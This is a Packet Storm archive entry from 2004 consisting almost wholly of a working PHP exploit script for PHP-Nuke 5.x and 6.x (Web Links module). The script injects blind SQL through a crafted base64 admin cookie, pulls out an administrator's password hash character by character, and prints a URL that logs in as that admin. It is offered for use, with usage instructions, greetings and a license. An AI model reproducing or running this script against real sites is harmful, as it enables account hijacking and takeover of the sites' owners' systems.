The_First_Cut_Is_The_Deepest.txt

2004-02-10T00:00:00
ID PACKETSTORM:32659
Type packetstorm
Reporter Pokleyzz
Modified 2004-02-10T00:00:00

Description

                                        
                                            `#!/usr/bin/php -q  
PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>  
(Web Links module)  
  
<?php  
/*  
# PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>  
# 3rd January 2004 : 9:29 a.m  
# (Web Links module)  
#  
# bug found by pokleyzz (3rd January 2004 )  
#  
# Requirement:  
# PHP 4.x with curl extension;  
#  
# Greet:   
# tynon, sk ,wanvadder, sir_flyguy, wxyz , tenukboncit, kerengga_kurus ,   
# s0cket370 , b0iler, syscalls and ...  
#  
# Happy new year 2004 ...  
#  
# ----------------------------------------------------------------------------   
# "TEH TARIK-WARE LICENSE" (Revision 1):  
# wrote this file. As long as you retain this notice you   
# can do whatever you want with this stuff. If we meet some day, and you think   
# this stuff is worth it, you can buy me a "teh tarik" in return.   
# ----------------------------------------------------------------------------   
# (Base on Poul-Henning Kamp Beerware)  
#  
#  
*/  
  
if (!(function_exists('curl_init'))) {  
echo "cURL extension required\n";  
exit;  
}  
  
ini_set("max_execution_time","999999");  
  
$matches = "admin\.php\?op=LinksModLink";  
  
//$url = "http://127.0.0.1/src/phpnuke441a/html";  
$charmap = array (48,49,50,51,52,53,54,55,56,57,  
97,98,99,100,101,102,  
103,104,105,  
106,107,108,109,110,111,112,113,  
114,115,116,117,118,119,120,121,122  
);  
  
if($argv[1] && $argv[2]){  
  
$url = $argv[1];  
$author = $argv[2];  
if ($argv[3])  
$proxy = $argv[3];   
}  
else {  
echo "Usage: ".$argv[0]." <URL> <aid> [proxy]\n\n";  
echo "\tURL\t URL to phpnuke site (ex: http://127.0.0.1/html)\n";  
echo "\taid\t author id to get (ex: god)\n";  
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";   
exit;  
}  
$module = "/modules.php?name=Web_Links&l_op=MostPopular";  
$cookie = "admin={$admin}";  
$ch = curl_init();  
if ($proxy){  
curl_setopt($ch, CURLOPT_PROXY,$proxy);   
}  
curl_setopt($ch, CURLOPT_URL,$url.$module);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
$res=curl_exec ($ch);  
curl_close ($ch);  
if (!ereg("name=Web_Links&l_op=visit",$res)){  
echo "Not vulnerable. No link available\n";  
exit();  
}  
  
echo "Take your time for Teh Tarik... please wait ...\n\n";  
echo "Result:\n";  
echo "\t$author:";  
$admin = $author.":";  
  
for($i= 1;$i< 33;$i++){   
foreach ($charmap as $char){  
echo chr($char);  
$admin = ereg_replace("=","%3d",base64_encode("{$author}' and ascii(substring(pwd,$i,1))=$char/*:killu:killu"));  
$cookie = "admin={$admin}";  
$ch = curl_init();  
if ($proxy){  
curl_setopt($ch, CURLOPT_PROXY,$proxy);   
}  
curl_setopt($ch, CURLOPT_URL,$url.$module);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
//curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch, CURLOPT_COOKIE, $cookie);  
$res=curl_exec ($ch);  
curl_close ($ch);  
if (ereg($matches,$res)){  
//echo chr($char);  
$admin .= chr($char);  
break 1;  
}  
else {  
echo chr(8);  
}  
  
if ($char ==103){  
echo "\n\n\tNot Vulnerable or Something wrong occur ...\n";  
exit;  
}  
  
}  
}  
$admin .= "::";  
echo "\n\nAdmin URL:\n";  
echo "\t$url/admin.php?admin=".ereg_replace("=","%3d",base64_encode($admin));  
  
echo "\n";  
echo "\n\nEnjoy your self and Happy New Year 2004....";  
  
//if (eregi("^windows",$_ENV['OS'])){  
// exec("explorer \"$url/admin.php?admin=".ereg_replace("=","%3d",base64_encode($admin))."\"");   
//}  
?>  
  
`